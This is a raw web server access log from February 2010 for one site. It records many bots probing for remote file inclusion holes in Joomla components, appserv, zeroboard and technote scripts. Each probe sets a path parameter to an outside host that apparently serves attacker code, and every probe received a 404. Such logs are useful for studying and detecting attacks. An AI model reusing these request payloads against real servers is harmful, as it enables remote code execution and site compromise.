122.200.203.11 - - [20/Feb/2010:04:27:47 -0800] "GET /logs/////appserv/main.php?appserv_root=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [20/Feb/2010:04:27:48 -0800] "GET ////appserv/main.php?appserv_root=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [20/Feb/2010:04:27:48 -0800] "GET /logs/access_100201.log/////appserv/main.php?appserv_root=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [20/Feb/2010:04:27:48 -0800] "GET /logs/access_100118.log/////appserv/main.php?appserv_root=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [20/Feb/2010:04:28:02 -0800] "GET /logs/access_100119.log%20%20//skin/zero_vote/login.php?dir=http://www.hetweeshuis.nl/components/com_puter/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [20/Feb/2010:04:28:06 -0800] "GET /logs/access_100120.log%20%20//bbs/good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [20/Feb/2010:04:28:10 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [20/Feb/2010:04:28:10 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [20/Feb/2010:04:28:10 -0800] "GET /logs/access_100124.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:04:28:12 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.fileden.com/files/2010/2/18/2765513/a.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:04:28:14 -0800] "GET /logs/access_100121.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.fileden.com/files/2010/2/18/2765513/a.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:04:28:14 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.fileden.com/files/2010/2/18/2765513/a.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [20/Feb/2010:04:28:31 -0800] "GET /logs/access_100121.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:04:29:07 -0800] "GET /logs/access_100124.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.fileden.com/files/2010/2/18/2765513/a.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.232.45.121 - - [20/Feb/2010:04:29:13 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.232.45.121 - - [20/Feb/2010:04:29:14 -0800] "GET /logs/access_100124.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.232.45.121 - - [20/Feb/2010:04:29:14 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.232.45.121 - - [20/Feb/2010:04:29:48 -0800] "GET /logs/access_100121.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.232.45.121 - - [20/Feb/2010:04:30:19 -0800] "GET /logs/access_100124.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.232.45.121 - - [20/Feb/2010:04:30:19 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.232.45.121 - - [20/Feb/2010:04:30:19 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
119.63.198.26 - - [20/Feb/2010:04:31:10 -0800] "GET /ideal/forum/viewtopic.php?p=21326 HTTP/1.1" 404 5258 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.puaga.com"
88.191.43.7 - - [20/Feb/2010:04:31:20 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [20/Feb/2010:04:31:20 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [20/Feb/2010:04:31:20 -0800] "GET /logs/access_100111.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.232.45.121 - - [20/Feb/2010:04:31:32 -0800] "GET /logs/access_100121.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.172.33.230 - - [20/Feb/2010:04:32:36 -0800] "GET /logs/access_100205.log///write_comment_update.php?board_skin_path=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [20/Feb/2010:04:32:57 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [20/Feb/2010:04:32:57 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [20/Feb/2010:04:32:57 -0800] "GET /logs/access_100124.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [20/Feb/2010:04:32:58 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [20/Feb/2010:04:32:58 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [20/Feb/2010:04:32:58 -0800] "GET /logs/access_100207.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [20/Feb/2010:04:33:00 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [20/Feb/2010:04:33:00 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [20/Feb/2010:04:33:00 -0800] "GET /logs/access_100207.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [20/Feb/2010:04:33:01 -0800] "GET /logs/access_100111.log%20%20//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [20/Feb/2010:04:33:08 -0800] "GET /logs/access_100129.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [20/Feb/2010:04:33:12 -0800] "GET /logs/access_100129.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:04:34:42 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:04:34:42 -0800] "GET /logs/access_100129.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.187.91.50 - - [20/Feb/2010:04:34:43 -0800] "GET /errors.php?error=http://phsoo.com/zeroboard/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:04:34:43 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.187.91.50 - - [20/Feb/2010:04:34:43 -0800] "GET /logs/access_100203.log%20%20/errors.php?error=http://phsoo.com/zeroboard/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.187.91.50 - - [20/Feb/2010:04:34:43 -0800] "GET /errors.php?error=http://phsoo.com/zeroboard/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.187.91.50 - - [20/Feb/2010:04:34:43 -0800] "GET /logs/errors.php?error=http://phsoo.com/zeroboard/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.187.91.50 - - [20/Feb/2010:04:34:43 -0800] "GET /logs/errors.php?error=http://phsoo.com/zeroboard/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.187.91.50 - - [20/Feb/2010:04:34:43 -0800] "GET /logs/access_100203.log%20%20/errors.php?error=http://phsoo.com/zeroboard/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.187.91.50 - - [20/Feb/2010:04:34:47 -0800] "GET /logs/access_100208.log%20%20/errors.php?error=http://phsoo.com/zeroboard/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.187.91.50 - - [20/Feb/2010:04:34:49 -0800] "GET /logs/access_100208.log%20%20/errors.php?error=http://phsoo.com/zeroboard/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:04:34:49 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:04:34:50 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:04:34:50 -0800] "GET /logs/access_100129.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:04:35:18 -0800] "GET /logs/access_100207.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:04:35:23 -0800] "GET /logs/access_100207.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.232.45.121 - - [20/Feb/2010:04:35:41 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.232.45.121 - - [20/Feb/2010:04:35:42 -0800] "GET /logs/access_100207.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.232.45.121 - - [20/Feb/2010:04:35:42 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.232.45.121 - - [20/Feb/2010:04:35:55 -0800] "GET /logs/access_100129.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.232.45.121 - - [20/Feb/2010:04:36:00 -0800] "GET /logs/access_100207.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.232.45.121 - - [20/Feb/2010:04:36:00 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.232.45.121 - - [20/Feb/2010:04:36:00 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.232.45.121 - - [20/Feb/2010:04:36:13 -0800] "GET /logs/access_100129.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [20/Feb/2010:04:36:15 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [20/Feb/2010:04:36:25 -0800] "GET /logs/access_100123.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [20/Feb/2010:04:36:25 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [20/Feb/2010:04:36:29 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [20/Feb/2010:04:36:29 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [20/Feb/2010:04:36:30 -0800] "GET /logs/access_100207.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [20/Feb/2010:04:36:49 -0800] "GET /logs/access_100129.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [20/Feb/2010:04:36:57 -0800] "GET //appserv/main.php?appserv_root=http://www.sinhan.net/zeroboard41/icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [20/Feb/2010:04:36:57 -0800] "GET /logs/access_100111.log///appserv/main.php?appserv_root=http://www.sinhan.net/zeroboard41/icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [20/Feb/2010:04:36:57 -0800] "GET /logs///appserv/main.php?appserv_root=http://www.sinhan.net/zeroboard41/icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [20/Feb/2010:04:38:49 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [20/Feb/2010:04:38:49 -0800] "GET /logs/access_100123.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [20/Feb/2010:04:38:49 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [20/Feb/2010:04:39:16 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [20/Feb/2010:04:39:16 -0800] "GET /logs/access_100119.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [20/Feb/2010:04:39:16 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:04:39:19 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:04:39:19 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:04:39:19 -0800] "GET /logs/access_100121.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [20/Feb/2010:04:39:42 -0800] "GET /logs/access_100126.log///appserv/main.php?appserv_root=http://www.sinhan.net/zeroboard41/icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [20/Feb/2010:04:39:59 -0800] "GET /logs/access_100120.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:04:40:01 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:04:40:01 -0800] "GET /logs/access_100121.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:04:40:01 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:04:40:21 -0800] "GET /logs/access_100124.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:04:40:50 -0800] "GET /logs/access_100124.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [20/Feb/2010:04:41:26 -0800] "GET /logs//common/db.php?commonpath=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [20/Feb/2010:04:41:26 -0800] "GET /common/db.php?commonpath=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [20/Feb/2010:04:41:26 -0800] "GET /logs/access_100118.log%20%20//common/db.php?commonpath=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [20/Feb/2010:04:42:47 -0800] "GET /common/db.php?commonpath=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [20/Feb/2010:04:42:47 -0800] "GET /logs//common/db.php?commonpath=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [20/Feb/2010:04:42:47 -0800] "GET /logs/access_100118.log//common/db.php?commonpath=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [20/Feb/2010:04:42:56 -0800] "GET /logs/access_100126.log%20%20//common/db.php?commonpath=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [20/Feb/2010:04:44:42 -0800] "GET /logs/access_100126.log//common/db.php?commonpath=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:04:45:28 -0800] "GET /logs/access_100121.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.fileden.com/files/2010/2/18/2765513/a.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.87.240.120 - - [20/Feb/2010:04:45:30 -0800] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:04:45:34 -0800] "GET /logs/access_100124.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.fileden.com/files/2010/2/18/2765513/a.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.187.91.50 - - [20/Feb/2010:04:46:45 -0800] "GET /logs/access_100203.log/errors.php?error=http://phsoo.com/zeroboard/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.187.91.50 - - [20/Feb/2010:04:47:09 -0800] "GET /logs/access_100109.log/errors.php?error=http://phsoo.com/zeroboard/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [20/Feb/2010:04:49:14 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [20/Feb/2010:04:49:14 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [20/Feb/2010:04:49:14 -0800] "GET /logs/access_100119.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [20/Feb/2010:04:49:35 -0800] "GET /logs/access_100114.log%20%20//skin/zero_vote/login.php?dir=http://www.hetweeshuis.nl/components/com_puter/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
